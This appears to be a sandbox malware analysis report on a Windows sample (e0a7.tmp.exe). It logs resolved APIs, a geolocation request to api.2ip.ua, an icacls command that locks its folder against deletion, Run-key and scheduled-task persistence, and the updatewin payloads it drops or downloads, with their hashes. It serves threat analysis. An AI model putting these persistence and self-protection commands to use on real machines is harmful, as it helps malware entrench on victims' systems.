Get Address	c:\windows\syswow64\kernel32.dll	function = SetUnhandledExceptionFilter, address_out = 0x76c387c9	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = UnhandledExceptionFilter, address_out = 0x76c5772f	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = FreeEnvironmentStringsW, address_out = 0x76c351cb	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetEnvironmentStringsW, address_out = 0x76c351e3	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetCurrentProcessId, address_out = 0x76c311f8	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = QueryPerformanceCounter, address_out = 0x76c31725	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetStartupInfoW, address_out = 0x76c34d40	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = DeleteCriticalSection, address_out = 0x771645f5	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetTimeZoneInformation, address_out = 0x76c3465a	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = RaiseException, address_out = 0x76c358a6	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetStringTypeW, address_out = 0x76c31946	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = HeapSize, address_out = 0x77163002	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = LoadLibraryExW, address_out = 0x76c3495d	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = HeapAlloc, address_out = 0x7715e026	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetLocaleInfoW, address_out = 0x76c33c42	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = IsValidLocale, address_out = 0x76c4ce46	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetUserDefaultLCID, address_out = 0x76c33da5	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = EnumSystemLocalesW, address_out = 0x76cb425f	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetDateFormatW, address_out = 0x76c534d7	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetTimeFormatW, address_out = 0x76c4f481	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = CompareStringW, address_out = 0x76c33bca	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = LCMapStringW, address_out = 0x76c317b9	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetConsoleCP, address_out = 0x76cd7bff	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetConsoleMode, address_out = 0x76c31328	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = HeapReAlloc, address_out = 0x77171f6e	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = SetStdHandle, address_out = 0x76cb454f	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = SetEndOfFile, address_out = 0x76c4ce2e	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetStdHandle, address_out = 0x76c351b3	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetFileType, address_out = 0x76c33531	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetModuleHandleExW, address_out = 0x76c34a6f	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = WriteConsoleW, address_out = 0x76c57aca	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = ReadConsoleW, address_out = 0x76cd739a	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = OutputDebugStringW, address_out = 0x76c5d1d4	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = SetConsoleCtrlHandler, address_out = 0x76c38a09	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = RtlUnwind, address_out = 0x76c5d1c3	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = LeaveCriticalSection, address_out = 0x77152270	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = EnterCriticalSection, address_out = 0x771522b0	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = AreFileApisANSI, address_out = 0x76cb40d1	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetProcessHeap, address_out = 0x76c314e9	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetCurrentThreadId, address_out = 0x76c31450	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetCurrentThread, address_out = 0x76c317ec	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetCPInfo, address_out = 0x76c35189	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = HeapFree, address_out = 0x76c314c9	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = SetEnvironmentVariableA, address_out = 0x76c3e331	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetSystemTimeAsFileTime, address_out = 0x76c33509	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetCurrentProcess, address_out = 0x76c31809	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = CreateSemaphoreW, address_out = 0x76c4ca5a	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetOEMCP, address_out = 0x76c5d1a1	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetACP, address_out = 0x76c3179c	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = IsValidCodePage, address_out = 0x76c34493	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = FindNextFileW, address_out = 0x76c354ee	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = IsDebuggerPresent, address_out = 0x76c34a5d	1	Fn
Get Address	c:\windows\syswow64\user32.dll	function = LoadCursorW, address_out = 0x74f588f7	1	Fn
Get Address	c:\windows\syswow64\user32.dll	function = TranslateMessage, address_out = 0x74f57809	1	Fn
Get Address	c:\windows\syswow64\user32.dll	function = RegisterClassExW, address_out = 0x74f5b17d	1	Fn
Get Address	c:\windows\syswow64\user32.dll	function = ShowWindow, address_out = 0x74f60dfb	1	Fn
Get Address	c:\windows\syswow64\user32.dll	function = IsWindow, address_out = 0x74f57136	1	Fn
Get Address	c:\windows\syswow64\user32.dll	function = CreateWindowExW, address_out = 0x74f58a29	1	Fn
Get Address	c:\windows\syswow64\user32.dll	function = UpdateWindow, address_out = 0x74f63559	1	Fn
Get Address	c:\windows\syswow64\user32.dll	function = DefWindowProcW, address_out = 0x771625dd	1	Fn
Get Address	c:\windows\syswow64\user32.dll	function = PeekMessageW, address_out = 0x74f605ba	1	Fn
Get Address	c:\windows\syswow64\user32.dll	function = PostThreadMessageW, address_out = 0x74f58bff	1	Fn
Get Address	c:\windows\syswow64\user32.dll	function = MessageBoxW, address_out = 0x74fafd3f	1	Fn
Get Address	c:\windows\syswow64\user32.dll	function = DispatchMessageW, address_out = 0x74f5787b	1	Fn
Get Address	c:\windows\syswow64\user32.dll	function = PostQuitMessage, address_out = 0x74f59abb	1	Fn
Get Address	c:\windows\syswow64\user32.dll	function = DestroyWindow, address_out = 0x74f59a55	1	Fn
Get Address	c:\windows\syswow64\user32.dll	function = SendMessageW, address_out = 0x74f59679	1	Fn
Get Address	c:\windows\syswow64\user32.dll	function = GetMessageW, address_out = 0x74f578e2	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = CryptGetHashParam, address_out = 0x74d4df7e	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = CryptAcquireContextW, address_out = 0x74d4df14	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = OpenSCManagerW, address_out = 0x74d4ca64	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = OpenServiceW, address_out = 0x74d4ca4c	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = CryptReleaseContext, address_out = 0x74d4e124	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = GetUserNameW, address_out = 0x74d5157a	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = CryptHashData, address_out = 0x74d4df36	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = RegSetValueExW, address_out = 0x74d514d6	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = RegCloseKey, address_out = 0x74d5469d	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = CryptDestroyHash, address_out = 0x74d4df66	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = ControlService, address_out = 0x74d67144	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = RegOpenKeyExW, address_out = 0x74d5468d	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = CryptCreateHash, address_out = 0x74d4df4e	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = CryptEncrypt, address_out = 0x74d6779b	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = CryptImportKey, address_out = 0x74d4c532	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = QueryServiceStatus, address_out = 0x74d52a86	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = RegQueryValueExW, address_out = 0x74d546ad	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = CloseServiceHandle, address_out = 0x74d5369c	1	Fn
Get Address	c:\windows\syswow64\shell32.dll	function = SHGetPathFromIDListW, address_out = 0x760617bf	1	Fn
Get Address	c:\windows\syswow64\shell32.dll	function = SHGetSpecialFolderLocation, address_out = 0x7605e141	1	Fn
Get Address	c:\windows\syswow64\shell32.dll	function = CommandLineToArgvW, address_out = 0x75fe9ee8	1	Fn
Get Address	c:\windows\syswow64\shell32.dll	function = ShellExecuteA, address_out = 0x76217078	1	Fn
Get Address	c:\windows\syswow64\shell32.dll	function = ShellExecuteExW, address_out = 0x75ff1e46	1	Fn
Get Address	c:\windows\syswow64\ole32.dll	function = CoInitialize, address_out = 0x755fb636	1	Fn
Get Address	c:\windows\syswow64\ole32.dll	function = CoInitializeSecurity, address_out = 0x75607259	1	Fn
Get Address	c:\windows\syswow64\ole32.dll	function = CoUninitialize, address_out = 0x756286d3	1	Fn
Get Address	c:\windows\syswow64\ole32.dll	function = CoCreateInstance, address_out = 0x75629d0b	1	Fn
Get Address	c:\windows\syswow64\oleaut32.dll	function = 202, address_out = 0x7522fd6b	1	Fn
Get Address	c:\windows\syswow64\oleaut32.dll	function = 2, address_out = 0x75224642	1	Fn
Get Address	c:\windows\syswow64\oleaut32.dll	function = 9, address_out = 0x75223eae	1	Fn
Get Address	c:\windows\syswow64\oleaut32.dll	function = 8, address_out = 0x75223ed5	1	Fn
Get Address	c:\windows\syswow64\oleaut32.dll	function = 6, address_out = 0x75223e59	1	Fn
Get Address	c:\windows\syswow64\oleaut32.dll	function = 200, address_out = 0x75223f21	1	Fn
Get Address	c:\windows\syswow64\oleaut32.dll	function = 12, address_out = 0x75225dee	1	Fn
Get Address	c:\windows\syswow64\oleaut32.dll	function = 201, address_out = 0x75224af8	1	Fn
Get Address	c:\windows\syswow64\iphlpapi.dll	function = GetAdaptersInfo, address_out = 0x74ae9263	1	Fn
Get Address	c:\windows\syswow64\ws2_32.dll	function = 12, address_out = 0x75bcb131	1	Fn
Get Address	c:\windows\syswow64\ws2_32.dll	function = 11, address_out = 0x75bc311b	1	Fn
Get Address	c:\windows\syswow64\ws2_32.dll	function = 52, address_out = 0x75bd7673	1	Fn
Get Address	c:\windows\syswow64\dnsapi.dll	function = DnsQuery_W, address_out = 0x74a9572c	1	Fn
Get Address	c:\windows\syswow64\dnsapi.dll	function = DnsFree, address_out = 0x74a8436b	1	Fn
Get Address	c:\windows\syswow64\crypt32.dll	function = CryptStringToBinaryA, address_out = 0x759e5d77	1	Fn
Get Address	c:\windows\syswow64\msvcr100.dll	function = atexit, address_out = 0x749dc544	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = InitializeCriticalSectionEx, address_out = 0x76c34d28	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = CreateEventExW, address_out = 0x76cb410b	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = CreateSemaphoreExW, address_out = 0x76cb4195	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = SetThreadStackGuarantee, address_out = 0x76c3d31f	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = CreateThreadpoolTimer, address_out = 0x76c4ee7e	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = SetThreadpoolTimer, address_out = 0x7717441c	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = WaitForThreadpoolTimerCallbacks, address_out = 0x7719c50e	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = CloseThreadpoolTimer, address_out = 0x7719c381	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = CreateThreadpoolWait, address_out = 0x76c4f088	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = SetThreadpoolWait, address_out = 0x771805d7	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = CloseThreadpoolWait, address_out = 0x7719ca24	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = FlushProcessWriteBuffers, address_out = 0x77150b8c	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = FreeLibraryWhenCallbackReturns, address_out = 0x7720fde8	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetCurrentProcessorNumber, address_out = 0x771a1e1d	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetLogicalProcessorInformation, address_out = 0x76cb4761	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = CreateSymbolicLinkW, address_out = 0x76cacd11	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = SetDefaultDllDirectories, address_out = 0x0	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = EnumSystemLocalesEx, address_out = 0x76cb424f	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = CompareStringEx, address_out = 0x76cb46b1	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetDateFormatEx, address_out = 0x76cc6676	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetLocaleInfoEx, address_out = 0x76cb4751	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetTimeFormatEx, address_out = 0x76cc65f1	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetUserDefaultLocaleName, address_out = 0x76cb47c1	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = IsValidLocaleName, address_out = 0x76cb47e1	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = LCMapStringEx, address_out = 0x76cb47f1	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetCurrentPackageId, address_out = 0x0	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetTickCount64, address_out = 0x76c4eee0	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetFileInformationByHandleExW, address_out = 0x0	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = SetFileInformationByHandleW, address_out = 0x0	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = EnumProcesses, address_out = 0x0	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = EnumProcessModules, address_out = 0x0	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetModuleBaseNameW, address_out = 0x0	1	Fn
Get Address	c:\windows\syswow64\psapi.dll	function = EnumProcesses, address_out = 0x75141544	1	Fn
Get Address	c:\windows\syswow64\psapi.dll	function = EnumProcessModules, address_out = 0x75141408	1	Fn
Get Address	c:\windows\syswow64\psapi.dll	function = GetModuleBaseNameW, address_out = 0x7514152c	1	Fn
Get Address	c:\windows\syswow64\shell32.dll	function = SHGetFolderPathW, address_out = 0x76055708	1	Fn

Keyboard (249)

Operation	Additional Information	Success	Count	Logfile
Get Info	type = KB_CODEPAGE, result_out = 437		249	Fn

System (8)

Operation	Additional Information	Count	Logfile
Get Time	type = System Time, time = 2019-05-05 18:39:13 (UTC)	1	Fn
Get Time	type = Ticks, time = 109387	1	Fn
Get Time	type = Performance Ctr, time = 16164881428	1	Fn
Get Time	type = System Time, time = 2019-05-05 18:39:15 (UTC)	1	Fn
Get Time	type = Performance Ctr, time = 16946012220	1	Fn
Get Time	type = System Time, time = 2019-05-05 18:39:42 (UTC)	1	Fn
Get Info	type = Operating System	1	Fn
Get Info	type = Operating System	1	Fn

Environment (2)

Operation	Additional Information	Success	Count	Logfile
Get Environment String	-		2	Fn Data

Network Behavior

HTTP Sessions (1)

Information	Value
Total Data Sent	467 bytes
Total Data Received	7.12 KB
Contacted Host Count	1
Contacted Hosts	77.123.139.189

HTTP Session #1

Information	Value
Server Name	api.2ip.ua
Server Port	443
Username	-
Password	-
Data Sent	467 bytes
Data Received	7.12 KB

Operation	Additional Information	Count	Logfile
Open Session	user_agent = Microsoft Internet Explorer, access_type = INTERNET_OPEN_TYPE_PRECONFIG	1	Fn
Open Connection	protocol = https, server_name = api.2ip.ua, server_port = 443	1	Fn
Open HTTP Request	http_verb = GET, http_version = HTTP 1.1, target_resource = /geo.json	1	Fn
Send HTTP Request	headers = WINHTTP_NO_ADDITIONAL_HEADERS, url = https://api.2ip.ua/geo.json	1	Fn
Read Response	size = 10240, size_out = 465	1	Fn Data
Close Session	-	1	Fn

Process #3: icacls.exe

Information	Value
ID	#3
File Name	c:\windows\syswow64\icacls.exe
Command Line	icacls "C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\2006ca9c-6d4b-419c-b4a6-823d20d370ff" /deny *S-1-1-0:(OI)(CI)(DE,DC)
Initial Working Directory	C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\
Monitor	Start Time: 00:01:24, Reason: Child Process
Unmonitor	End Time: 00:01:26, Reason: Self Terminated
Monitor Duration	00:00:02
Remark	No high level activity detected in monitored regions

OS Process Information

Information	Value
PID	0xa48
Parent PID	0x8e8 (c:\users\5p5nrgjn0js halpmcxz\desktop\e0a7.tmp.exe)
Bitness	32-bit
Is Created or Modified Executable
Integrity Level	High (Elevated)
Username	XDUWTFONO\5p5NrGJn0jS HALPmcxz
Enabled Privileges	SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege
Thread IDs	0x A4C 0x A50

Process #4: taskeng.exe

Information	Value
ID	#4
File Name	c:\windows\system32\taskeng.exe
Command Line	taskeng.exe {0E3013FB-5D32-4499-A940-035C87CD1A3B} S-1-5-21-3388679973-3930757225-3770151564-1000:XDUWTFONO\5p5NrGJn0jS HALPmcxz:Interactive:Highest[1]
Initial Working Directory	C:\Windows\system32\
Monitor	Start Time: 00:01:25, Reason: Created Scheduled Job
Unmonitor	End Time: 00:01:50, Reason: Self Terminated
Monitor Duration	00:00:25
Remark	No high level activity detected in monitored regions

OS Process Information

Information	Value
PID	0x50c
Parent PID	0x36c (Unknown)
Bitness	64-bit
Is Created or Modified Executable
Integrity Level	High (Elevated)
Username	XDUWTFONO\5p5NrGJn0jS HALPmcxz
Enabled Privileges	SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege
Thread IDs	0x 824 0x 578 0x 574 0x 520 0x 514 0x 510 0x B18

Process #5: e0a7.tmp.exe

839

Information	Value
ID	#5
File Name	c:\users\5p5nrgjn0js halpmcxz\desktop\e0a7.tmp.exe
Command Line	"C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\E0A7.tmp.exe" --Admin IsNotAutoStart IsNotTask
Initial Working Directory	C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\
Monitor	Start Time: 00:01:26, Reason: Child Process
Unmonitor	End Time: 00:01:50, Reason: Self Terminated
Monitor Duration	00:00:24

OS Process Information

Information	Value
PID	0xa5c
Parent PID	0x8e8 (c:\users\5p5nrgjn0js halpmcxz\desktop\e0a7.tmp.exe)
Bitness	32-bit
Is Created or Modified Executable
Integrity Level	High (Elevated)
Username	XDUWTFONO\5p5NrGJn0jS HALPmcxz
Enabled Privileges	SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege
Thread IDs	0x A60 0x A68 0x A6C 0x A70 0x A74 0x A78 0x A7C 0x A80 0x A84 0x A88 0x A8C 0x AC4

Memory Dumps

Name	Start VA	End VA	Dump Reason	PE Rebuilds	Bitness	Entry Points	AV	YARA	Actions
e0a7.tmp.exe	0x00400000	0x004BBFFF	Relevant Image	-	32-bit	-			... Region Actions Download Dump

Dropped Files

Filename	File Size	Hash Values	YARA Match	Actions
C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\c557195c-349f-4f92-bc77-a9a63b9592e0\updatewin.exe	10.00 KB	MD5: 60b5a8459be4d1aca809af5638e9ec4d SHA1: 3315a44662723e34bf80f3adea83899dc25b3401 SHA256: dd91675d940c8ed8066626e6f1bcadae118562f26ec15e1a1e1bd86ba18a7978 SSDeep: 192:ROJDTUsKaieULyeunncx7wBUH8GD8KAmS9DYkEU3:EJP5KaieUxuncpwBUcQzvS6kEU3		... File Actions Show Properties Download

Downloaded Files

Filename	File Size	Hash Values	YARA Match	Actions
C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\c557195c-349f-4f92-bc77-a9a63b9592e0\updatewin1.exe	272.50 KB	MD5: 5b4bd24d6240f467bfbc74803c9f15b0 SHA1: c17f98c182d299845c54069872e8137645768a1a SHA256: 14c7bec7369d4175c6d92554b033862b3847ff98a04dfebdf9f5bb30180ed13e SSDeep: 6144:7qZQGv0d4dW6efSyahstfKVkW5XXnXXfXXXWXXXXHXXXXBXXXXgXXXXX5XXXXiXk:2ZQGXdPe6qU6W5XXnXXfXXXWXXXXHXXE		... File Actions Show Properties Download
C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\c557195c-349f-4f92-bc77-a9a63b9592e0\updatewin2.exe	274.50 KB	MD5: 996ba35165bb62473d2a6743a5200d45 SHA1: 52169b0b5cce95c6905873b8d12a759c234bd2e0 SHA256: 5caffdc76a562e098c471feaede5693f9ead92d5c6c10fb3951dd1fa6c12d21d SSDeep: 6144:vLgbC0mVQlY+3aKn7n4CTHcXXnXXfXXXWXXXXHXXXXBXXXXgXXXXX5XXXXiXXXXP:vGCtQlb3aKzvT8XXnXXfXXXWXXXXHXXf		... File Actions Show Properties Download

Host Behavior

COM (8)

Operation	Class	Interface	Additional Information	Count	Logfile
Create	TaskScheduler	ITaskService	cls_context = CLSCTX_INPROC_SERVER	1	Fn
Execute	TaskScheduler	ITaskService	method_name = Connect, server_name = 95, domain = 95, password = 4289035	1	Fn
Execute	TaskScheduler	ITaskService	method_name = GetFolder, path = \, new_interface = ITaskFolder	1	Fn
Execute	TaskScheduler	ITaskService	method_name = NewTask, new_interface = ITaskDefinition	1	Fn
Execute	TaskScheduler	ITaskDefinition	method_name = get_Triggers, new_interface = ITriggerCollection	1	Fn
Execute	TaskScheduler	ITriggerCollection	method_name = Create, type = TASK_TRIGGER_TIME, new_interface = IDailyTrigger	1	Fn
Execute	TaskScheduler	IDailyTrigger	method_name = put_StartBoundary, start_boundary = 2019-05-06T04:40:15	1	Fn
Execute	TaskScheduler	ITaskDefinition	method_name = get_Actions, new_interface = IActionCollection	1	Fn

File (67)

Operation	Filename	Additional Information	Count	Logfile
Create	C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\c557195c-349f-4f92-bc77-a9a63b9592e0\updatewin1.exe	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\c557195c-349f-4f92-bc77-a9a63b9592e0\updatewin2.exe	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\c557195c-349f-4f92-bc77-a9a63b9592e0\updatewin.exe	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create Directory	C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\c557195c-349f-4f92-bc77-a9a63b9592e0	-	1	Fn
Open	STD_INPUT_HANDLE	-	2	Fn
Open	STD_OUTPUT_HANDLE	-	2	Fn
Open	STD_ERROR_HANDLE	-	2	Fn
Write	C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\c557195c-349f-4f92-bc77-a9a63b9592e0\updatewin1.exe	size = 10240	27	Fn Data
Write	C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\c557195c-349f-4f92-bc77-a9a63b9592e0\updatewin1.exe	size = 2560	1	Fn Data
Write	C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\c557195c-349f-4f92-bc77-a9a63b9592e0\updatewin2.exe	size = 10240	27	Fn Data
Write	C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\c557195c-349f-4f92-bc77-a9a63b9592e0\updatewin2.exe	size = 4608	1	Fn Data
Write	C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\c557195c-349f-4f92-bc77-a9a63b9592e0\updatewin.exe	size = 10240	1	Fn Data

Registry (5)

Operation	Key	Additional Information	Count	Logfile
Open Key	HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run	-	1	Fn
Open Key	HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion	-	1	Fn
Read Value	HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run	value_name = SysHelper, data = "C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\2006ca9c-6d4b-419c-b4a6-823d20d370ff\E0A7.tmp.exe" --AutoStart, type = REG_EXPAND_SZ	1	Fn
Read Value	HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion	value_name = SysHelper, data = 0, type = REG_NONE	1	Fn
Write Value	HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion	value_name = SysHelper, data = 1, size = 4, type = REG_DWORD_LITTLE_ENDIAN	1	Fn

Process (48)

Operation	Process	Additional Information	Count	Logfile
Create	C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\c557195c-349f-4f92-bc77-a9a63b9592e0\updatewin1.exe	show_window = SW_SHOWNORMAL	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\c557195c-349f-4f92-bc77-a9a63b9592e0\updatewin2.exe	show_window = SW_SHOWNORMAL	1	Fn
Enumerate Processes	-	-	1	Fn
Open	System	desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION	1	Fn
Open	c:\windows\system32\smss.exe	desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION	1	Fn
Open	c:\windows\system32\csrss.exe	desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION	1	Fn
Open	c:\windows\system32\wininit.exe	desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION	1	Fn
Open	c:\windows\system32\csrss.exe	desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION	1	Fn
Open	c:\windows\system32\winlogon.exe	desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION	1	Fn
Open	c:\windows\system32\services.exe	desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION	1	Fn
Open	c:\windows\system32\lsass.exe	desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION	1	Fn
Open	c:\windows\system32\lsm.exe	desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION	1	Fn
Open	c:\windows\system32\svchost.exe	desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION	1	Fn
Open	c:\windows\system32\svchost.exe	desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION	1	Fn
Open	c:\windows\system32\svchost.exe	desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION	1	Fn
Open	c:\windows\system32\svchost.exe	desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION	1	Fn
Open	c:\windows\system32\svchost.exe	desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION	1	Fn
Open	c:\windows\system32\audiodg.exe	desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION	1	Fn
Open	c:\windows\system32\svchost.exe	desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION	1	Fn
Open	c:\windows\system32\svchost.exe	desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION	1	Fn
Open	c:\windows\system32\dwm.exe	desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION	1	Fn
Open	c:\windows\explorer.exe	desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION	1	Fn
Open	c:\windows\system32\spoolsv.exe	desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION	1	Fn
Open	c:\windows\system32\taskhost.exe	desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION	1	Fn
Open	c:\windows\system32\svchost.exe	desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION	1	Fn
Open	c:\windows\system32\taskeng.exe	desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION	1	Fn
Open	c:\windows\system32\taskhost.exe	desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION	1	Fn
Open	c:\program files (x86)\windows sidebar\hk forest representatives.exe	desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION	1	Fn
Open	c:\program files (x86)\windows media player\highway long.exe	desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION	1	Fn
Open	c:\program files\windows portable devices\developing.exe	desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION	1	Fn
